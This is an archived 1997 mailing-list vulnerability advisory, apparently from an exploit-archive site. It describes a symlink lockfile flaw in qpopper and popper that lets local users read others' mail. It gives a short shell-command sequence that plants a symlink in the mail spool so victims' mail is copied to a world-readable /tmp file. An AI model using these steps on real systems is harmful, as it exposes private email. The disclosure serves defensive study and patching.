Popper and qpopper symlink hole

Summary
Description:qpopper and popper use an insecure lockfile creation mechanism that allows you to read other people's mail.
Author:dynamo@IME.NET
Compromise:Read other people's mail when they fetch it via pop.
Vulnerable Systems:Those running vulnerable versions of popper and qpopper. Probably those below version 2.2
Date:7 August 1997
Details


Date: Thu, 7 Aug 1997 21:04:47 -0400
From: dynamo@IME.NET
To: BUGTRAQ@NETSPACE.ORG
Subject: popper and qpopper let you read email from other pop clients

when i found this, i checked the archive to see if anyone else had found
this, and it didnt look like it.. if its a repost of ideas, sorry.

Some versions of popper and qpopper from qualcomm allow you to read
other peoples email.  There are quite a few situations in which you
need your mail spool directory chmodded 1777.  If you have local users
on a machine with the mail spool directory, they can create symbolic
links from the temporary pop drop box to a file that they can read.

See if youre vulnerable:

        1) touch /tmp/lumpy; chmod 777 /tmp/lumpy
        2) ln -s /tmp/lumpy /var/mail/.luser.pop
        3) wait for them to check their email.
        4) while they are reading it from the pop
           server, look at the file in the tmp dir.

Apparently it is fixed in the newest version.


dynamo

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]